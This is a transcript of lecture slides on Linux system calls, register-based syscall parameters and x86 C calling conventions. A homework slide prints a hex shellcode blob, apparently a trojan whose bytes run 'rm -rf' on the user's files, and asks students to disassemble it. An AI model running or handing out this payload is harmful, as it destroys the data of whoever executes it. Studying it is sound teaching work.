System Calls, C Library Functions - PowerPoint PPT Presentation

1 / 23

About This Presentation

Title:

System Calls, C Library Functions

Description:

What happens if a functions requires more parameters than you have registers? What is a parameter won't fit in a register? An entire struct for example? ... – PowerPoint PPT presentation

Number of Views:43

Avg rating:3.0/5.0

Slides: 24

Provided by: Chris9

Category:

more less

Transcript and Presenter's Notes

Title: System Calls, C Library Functions

1
System Calls, C Library Functions

LCDR Eagle

2
Homework Review

Uppercase
Aitel email
Shellcode

3
Aitel Email

Program received signal SIGTRAP, Trace/breakpoint
trap.
Switching to Thread 1116941248 (LWP 17453)
0x080edf41 in ?? ()
(gdb) x/10xw eip
0x80edf41 0xcccccccc 0xcccccccc 0xcccccccc
0xcccccccc
0x80edf51 0xcccccccc 0xcccccccc 0xcccccccc
0xcccccccc
0x80edf61 0xcccccccc 0xcccccccc

4
Shellcode

unsigned char linux_shellcode / contributed
by antiNSA / "\x31\xc0\x31\xdb\x31\xc9\x3
1\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\
x74\x68\x43" "\x54\x52\x4c\x68\x73\x2e\x2e
\x20\x68\x63\x6f\x6e\x64\x68\x35"
"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\
x7e\x68\x72" "\x6d\x20\x2d\xb3\x02\x89\xe1
\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\
x31\xd2\x66" "\xba\x70\x50\x52\xb3\x02\x89
\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\
xb0\xa2\xcd" "\x80\x4f\x31\xc0\x39\xc7\x75
\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\
x2d\x63\x58" "\x72\x68\x41\x41\x41\x41\x68
\x41\x41\x41\x41\x68\x41\x41\x41"
"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\
x2f\x62\x69" "\x6e\x31\xc0\x88\x44\x24\x07
\x88\x44\x24\x1a\x88\x44\x24\x23"
"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\
x24\x0c\x31" "\xdb\x8d\x5c\x24\x1b\x89\x5c
\x24\x10\x89\x44\x24\x14\x31\xdb"
"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\
xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd
\x80"

5
Compile It

Compile the code with the debugging switch -g
gcc o exploit g exploit.c
Load it into gdb
gdb exploit
Disassemble the program at the location of the
string
disassemble shellcode

6
System Calls

Operating system services are exposed via the
"system call" mechanism
System calls represent the assembly language
interface to the operating system
The C/C libraries simply provide a C function
call interface to the Linux system calls

7
Linux System Calls

Invoked using an int 0x80
This is a software interrupt
Transfers control to the kernel
Transitions to kernel stack so we can't pass our
parameters on the stack
Parameters placed into various CPU registers

8
Linux System Calls (ii)

There are about 190 different system calls
But there is only one int 0x80
Specify which system call you wish to make by
placing the syscall number into eax before
executing int 0x80
Not well documented
http//www.linuxassembly.org/syscall.html

9
Linux System Calls (iii)

A system call is essentially a call to a kernel
function
Like a function call, each system call expects
zero or more parameters
System calls expect their parameters in very
specific registers

10
Linux System Calls (iv)

Syscall parameters (if necessary)
ebx first parameter
ecx second parameter
edx third parameter
esi fourth parameter
edi fifth parameter

11
Useful System Calls
12
Why Use Syscalls

No need for libraries
Smallest fastest code
Often used in shell code
No need to link to libraries
Windows does not use syscalls
Windows shell code is more difficult to write

13
Parameter Passing

Many functions require parameters
You may pass parameters around any way you see
fit
For example
You could write a function that expects two
parameters and requires the caller to place them
in EAX and EBX
As long as you know what your function expects,
you will be able to call it

14
Parameter Passing (ii)

A good idea to be consistent across functions
Problems
What happens if a functions requires more
parameters than you have registers?
What is a parameter won't fit in a register?
An entire struct for example?
How to deal with recursion?
How will other programmers know how to call your
functions?

15
Calling Conventions (i)

Compiler writers have already dealt with all of
these issues
Particularly the many parameters and recursion
problem
By defining and adhering to calling conventions
We can interface to a wider variety of code
Others can interface to our code

16
Using C/C Libraries

Wider range of functions available
Less system dependent
Linux syscalls clearly only work on Linux systems
Must understand C/C calling conventions
How to pass parameters
Where to expect return
How to clean up the stack

17
Calling Conventions (ii)

Vary by compiler
Visual C
cdecl
Push parameters right to left
Caller cleans up stack
stdcall
Push parameters right to left
Called function cleans up stack
fastcall
First two parameters (on the left) go in ECX and
EDX
Remaining parameters are pushced right to left
thiscall
For C non-static member functions, this is
placed in ECX

18
Calling Conventions (iii)

gcc
Supports cdecl and stdcall
cdecl is the default
g
Uses thiscall for non-static member functions

19
Other Considerations

Where to expect return values?
Generally returned in EAX
64 bit values in EDXEAX
Preserving registers
gcc expects a function to preserve the contents
of some registers across a function call
EBX, EDI, ESI, EBP
push msg
call printf
add esp, 4 eax, ecx, edx may have changed

20
Calling a C Function

Knowing calling convention and required
parameters, you can call C functions from
assembly
section .data
format 'X s',0xA,0
section .text
push eax
push format
call printf
add esp, 8

21
Using C/C Libraries

Must link your object file (assembled source
file) to the libraries you wish to use
I find it easiest to let gcc do this for me
BUT! gcc wants to add a _start function for
library initialization prior to calling main
So, you better not name your entry point _start
Name it main to make gcc happy

22
Example